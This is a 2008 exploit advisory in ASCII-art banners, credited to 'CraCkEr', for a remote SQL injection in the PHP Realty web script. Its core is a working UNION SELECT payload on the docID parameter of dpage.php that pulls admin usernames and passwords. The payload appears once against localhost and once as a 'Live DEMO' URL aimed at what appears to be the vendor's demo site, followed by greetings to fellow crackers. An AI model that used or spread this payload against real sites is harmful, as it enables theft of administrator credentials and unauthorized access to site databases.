┌┌─────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └─────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌─────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Remote SQL Injection ] ┌┘ └─────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : : : │ Group : N/A │ │ │ │ Script : PHP Realty │ │ Register Globals : │ │ Download : ypninc.com │ │ │ │ Method : GET │ │ [█] ON [ ] OFF │ │ Critical : High [░░▒▒▓▓██] │ │ │ │ Impact : Manipulation of data │ │ │ │ ───────────────────────────────────────┘ └────────────────────────────────────── │ │ DALnet #crackers ┌┘ └─────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌─────────────────────────────────────────────────────────────────────────────────┐ ┌┘ Exploit URL's ┌┘ └─────────────────────────────────────────────────────────────────────────────────┘┘ [SQL] http://www.localhost.com/path/dpage.php?docID=-1 UNION SELECT 1,2,concat(Username,0x3a,Password) FROM admin-- Live DEMO: http://phprealty.ypninc.com/dpage.php?docID=-1 UNION SELECT 1,2,concat(Username,0x3a,Password) FROM admin-- └──────────────────────────────────────────────────────────────────────────────────┘ Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL . ┌┌─────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2008 ┌┘ └─────────────────────────────────────────────────────────────────────────────────┘┘